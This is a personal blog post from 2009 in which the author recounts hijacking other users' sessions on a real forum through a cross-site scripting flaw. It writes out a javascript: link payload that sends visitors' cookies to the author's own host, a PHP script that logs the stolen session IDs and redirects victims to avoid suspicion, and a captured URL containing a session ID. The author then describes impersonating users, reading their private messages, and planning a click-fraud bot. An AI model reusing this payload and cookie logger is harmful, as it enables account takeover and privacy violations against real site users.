Tuesday, August 11, 2009

Third Attack: XSS, Cookie Hijack and Cookie Manipulation

Despite the title, it really was a single attack. For almost a whole month of learning the ways of XSS (not CSS) and Cookie Hijack I started creating my own attacks. At first I thought XSS was an unbeatable prodigy, but after a while I realized it's noting more than embedding a script written in JavaScript language. Here's a few really good reference for it:

Even if you don't want to read a lot I recommend you the last one. A good attack on LA-PD's site is explained available for anyone.

Many things can be accomplished using XSS, but I wanted session hijacking. After reading about this on several places, I understood what I need. A place where I can write this simple JavaScript code:


document.cookie

That's a variable which contains all of the cookies of a user. I had to save it's value to a file available for me in a script available for everyone. I found that writing this

'>

to a search box on Lamer, wrote me some HTML code as text. I realized this by writing to the search box every special character I could think of. So I thought what about putting there another property, like:

' text='document.cookie'>

But wasn't this simple. And the struggling began. I came up with a pretty good XSS string after several days studying those on cheat-sheet, but every apostrophe used, got a / sign before it after pressing the search button, so my code became unprocurable and uninterpretable. I almost gave up every hope I had, when I found this. A harmless little trick. I found out from this, that by typing in the URL bar javascript:my_javascripts_script it's executed on the last site visited. It was browser-dependent tho.

I went to my user-page and I gave the following attribute to an input (I think was my signature, it's written in BB-code):

[link=javascript:window.location = "http://www.mysite.com/myscript.php?"+document.cookie]You need to visit this[/link]

And it worked. By clicking on the link it went to:

http://www.mysite.com/myscript.php?sitename=SinistraD%3A%3A%3A%here_was_a_hash_from_my_password; SiteNameCookieExpire=1250088989; PHPSESSID=2f65b91d6f8a72d1d5128f8afb8f67a7

This worked only if it was placed at the beginning of the input, otherwise somewhere (maybe on the server) got a http:// at the beginning, screwing the whole thing, because http://javascript: was not working any more. So, there was protection, but it had that little bug. Was not working, if started at the beginning. Thanks to that my script was. The only thing left was to implement the myscript.php. Here's the code:


<?php
$f = fopen("sessionids.txt", 'a');
fwrite($f, $_SERVER["REQUEST_URI"]."\n");
fclose($f);
header("Location: http://www.youtube.com/watch?v=wzqi1bfflDg");
?>

It saves the request URL, then redirects somewhere else, so the user won't be suspicious. After my setup was ready, I removed it from my profile and posted on the forum, on a topic where this was expected (links to other sites, funny and/or interesting references, mostly on YouTUBE).

I hadn't had to wait long, many users fell in the trap, the last thing remained was to use their cookies. I logged in with my user, removed every cookie except the one containing the session ID, then modified it's value by giving another given one. "Surprisingly", the result was, that I wasn't myself any more, but the user clicking on the link. The task with highest priority was to write a mail to the administrator using that account (not mine), but I had to hurry, because when you log in, the real user logs out automatically, and when he logs back in, he gets a new session ID, by this, mine becoming useless.

I had pretty much fun reading their personal messages, stored and implemented in the mail system offered by the site. It's just a PM system not an e-mail one.

This attack was my biggest accomplishment so far. But this time I was already thinking about implementing my own self, with high speed, a robot, who surfs without me, a click-fraud-bot.

No comments: